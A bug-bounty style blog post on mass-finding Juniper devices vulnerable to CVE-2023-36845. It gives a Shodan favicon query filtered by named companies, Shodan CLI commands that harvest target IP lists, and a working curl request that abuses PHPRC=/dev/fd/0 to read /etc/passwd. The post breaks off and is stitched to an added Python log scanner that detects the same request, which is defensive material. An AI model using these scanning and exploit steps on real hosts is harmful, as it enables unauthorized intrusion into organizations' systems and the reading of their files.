Good evening, hunters. Today I will show you how I was able to easily report many critical bugs on HackerOne, Bugcrowd, and external programs. My journey began with reading about a critical vulnerability in Juniper Networks systems, tracked as CVE-2023-36845, along with several other CVEs. Here's a breakdown of the process:
In this article, you’ll learn practical strategies for identifying and exploiting zero-day vulnerabilities as well as harnessing automation to streamline your bug-hunting process.
How to Search for Zero-Day Bugs?
The first step is understanding how to exploit the bug. Familiarize yourself with the CVE and gather more information about the vulnerability. And for this adventure, I brought along my buddy, Shodan.
In my case I can search for Juniper devices by their favicon hash, which is an easy way to do it:

```
http.favicon.hash:2141724739
```

Now we have a large number of hosts affected by this bug. Downloading and manually testing all of them wouldn't be efficient, and it takes a long time to filter out which ones belong to bug bounty programs. Instead, I use several filters to narrow down the list:
- I filter by country to focus on specific regions.
- I use an SSL filter to check for specific domains.
- Most importantly, I filter by organization. This allows me to target companies like AT&T, Comcast, or others with known bug bounty programs.

Using the Shodan CLI to download the relevant data into a file:

```
# Download the data into the file Juniper.json.gz
shodan download Juniper 'http.favicon.hash:2141724739 org:"AT&T Services Inc."'

# Extract the file and output only ip:port
shodan parse Juniper.json.gz --fields ip_str,port --separator " " | awk '{print $1":"$2}' | anew Juniper_ips
```
Now what? ohh EXPLOIT!!!
Exploiting the Remote Code Execution (RCE) vulnerability. In this case, the curl command is:

```
curl -kv "https://<target>/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'
```

Now everything is okay, but I need more fun!
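From the defending side, the request shown above leaves a clear trace in web-server access logs: a `PHPRC` query parameter pointing at a file descriptor. The following Python script is an added example (not code from the original post) that scans constructed combined-format log lines for that pattern; the log lines, IP addresses and `scan_log` / `phprc_fd_values` helpers are my assumptions for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# The override pattern from the exploit request: PHPRC pointed at /dev/fd/N so the
# request body is parsed as php.ini. Matched case-insensitively after URL-decoding.
PHPRC_FD = re.compile(r"^/dev/fd/\d+$", re.IGNORECASE)

# Constructed sample access-log lines (combined log format); not from any real host.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Oct/2023:21:03:11 +0000] "GET /about.php?PHPRC=/dev/fd/0 HTTP/1.1" 200 512 "-" "curl/8.1.2"
198.51.100.7 - - [12/Oct/2023:21:03:12 +0000] "GET /about.php HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Oct/2023:21:03:14 +0000] "POST /index.php?phprc=%2Fdev%2Ffd%2F0 HTTP/1.1" 200 128 "-" "curl/8.1.2"
192.0.2.9 - - [12/Oct/2023:21:04:00 +0000] "GET /about.php?lang=en HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def phprc_fd_values(target: str) -> list[str]:
    """Return every PHPRC value in the query string that points at /dev/fd/N."""
    hits = []
    for key, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        if key.lower() != "phprc":
            continue
        for v in values:
            # parse_qs already decodes once; unquote again to catch double-encoding
            if PHPRC_FD.match(unquote(v)):
                hits.append(v)
    return hits


def scan_log(text: str) -> list[dict]:
    """Flag log lines whose request target carries a PHPRC=/dev/fd/N override."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        values = phprc_fd_values(m["target"])
        if values:
            findings.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                             "target": m["target"], "status": int(m["status"]),
                             "phprc": values})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['method']} {f['target']} -> PHPRC={f['phprc']}")
```

A 200 response on a flagged line deserves the same attention as the request itself, since the page's curl command expects the override to succeed rather than be rejected.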